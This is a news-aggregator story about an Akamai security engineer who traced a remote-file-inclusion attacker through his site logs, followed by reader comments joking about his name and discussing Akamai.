Submitted via IRC for Bytram
Think you have bad luck? Imagine being the script kiddie who inadvertently tried and failed to pwn an Akamai security pro.
Larry Cashdollar, a senior security response engineer at the US-based global web giant, told us late last week he just recently noticed something peculiar in the logs on his personal website. Further investigation turned up signs of someone scanning for remote file inclusion (RFI) vulnerabilities.
[...] He told The Register his site's logs showed the would-be attacker probing for RFI holes that would allow them to trick web applications into fetching and running a remote malicious script. In this case, the scumbag was trying, unsuccessfully, to load a file via a custom tool Cashdollar had created for his site.
"Based on my log entries they appear to be parsing web sites looking for form variables and automatically testing if those variables allow remote file inclusion," Cashdollar told El Reg.
"It's a generic test against any website where they can parse out the form input variable and then supply a URL to that variable to see if the content is included and executed."
Unfortunately for the attacker, Cashdollar also used the logs to follow the GET requests to the payload the attacker was trying to load: a script that attempted to harvest information about his server. By dissecting that and other files the hacker had ready to execute commands and take over vulnerable websites, Cashdollar was also able to extract the criminal's email address and their preferred language – Portuguese.
[...] The Akamai security engineer told El Reg that, for admins, the big takeaway from his experience is the importance of watching logs, patching site management tools, and writing web code that cannot be exploited for RFI.
"Make sure their application patches are up to date," Cashdollar advised. "Keep track of any new vulnerabilities discovered in software they're using for content management and site delivery and patch when new vulnerabilities are disclosed by the vendor."
(Score: 0) by Anonymous Coward on Tuesday July 30 2019, @04:58AM (1 child)
I wonder how much the ad costs.
(Score: 0) by Anonymous Coward on Tuesday July 30 2019, @02:56PM
The guy's name is Cashdollar, which must be where the negotiations begin.
(Score: 0) by Anonymous Coward on Tuesday July 30 2019, @05:36AM (2 children)
Do they still exist? I thought cloudflare had completely eaten their lunch.
(Score: 1, Insightful) by Anonymous Coward on Tuesday July 30 2019, @07:28AM (1 child)
Akamai is huge. They are probably the biggest CDN still. While many smaller sites and companies still use them, many of the largest do. Plus, they have all sorts of government contracts. The main reason, I think, most newer or smaller websites and startups skip them is that Akamai doesn't have much public information available, especially when it comes to pricing. You have to go through the sales department. However, a buddy at a Fortune 500 said they are very price competitive, extremely responsive, and know how to schmooze the higher ups.
(Score: 0) by Anonymous Coward on Wednesday August 07 2019, @07:29PM
Although they had/have some sort of data sharing agreement.
But if it wasn't for Akamai a lot of web caching would have never happened and Google+Dejanews might be the only stuff that wasn't purged.
(Score: 1, Funny) by Anonymous Coward on Tuesday July 30 2019, @06:45AM (1 child)
Sounds like a bad rapper's stage name.
(Score: 0) by Anonymous Coward on Tuesday July 30 2019, @02:49PM
That ship sailed when we let Moxie Marlinspike speak with any authority.
(Score: 1, Touché) by Anonymous Coward on Tuesday July 30 2019, @01:11PM (1 child)
Seems a bit weak, he got the attackers email and preferred language, wow. And then what happened? If you open with that title and statements I expect the script kiddie to get pwned upon much harsher than that.
(Score: 0) by Anonymous Coward on Tuesday July 30 2019, @04:13PM
Well, Paige Thompson [apnews.com] wasn't as lucky as Señor Portugal who has an email address. Thompson even used Tor and a VPN.
(Score: 0) by Anonymous Coward on Tuesday July 30 2019, @04:58PM
i am am sure all the successful pwns of akamai security researchers news will fall from the web like like dead flies hosted on "content distribution networks by akamai" ...
(Score: 2, Funny) by jmichaelhudsondotnet on Tuesday July 30 2019, @05:24PM
If your last name is obviously made up you have to explain on your homepage when it was made up and by whom and why. You can't just say that's what they gave your great great grandpa at Ellis island.
I once had a boss named Bud Challenger, one of the worst people I have ever worked for. Someone out there has to have heard of this guy. It was in Hawaii. Like I said, I don't believe he's real until he tells me how he got that name.
At any rate, Akamai is bad news, look up their details and run away.
But thanks Mr. Cashdollar for the inspiring story. We should all scrape our honeypot logs nightly for interesting attackers we can countersurveil. The last apache log I looked at had several hundred chinese javascript requests per hour that looked like this:
klsdjfj29035j12o54n1jf0jw09j120rj123rj120j09fj3jr092j390j2fo2jf2j3f0923jf2pfj203j9f293jf2fj29023j2pfjkfj02j3.js
There was a garage door in the building that just kept randomly opening and no one could figure out why, but now I'm starting to put it all together.
(Score: 0) by Anonymous Coward on Tuesday July 30 2019, @05:31PM
...script kiddie violates GDPR against themselves. Okay, no that's not the case, however given current laws/stupidity, I can easily imagine a world where this scenario triggers some combination that lands both parties in trouble. Fail2Ban script kiddies and be done with it.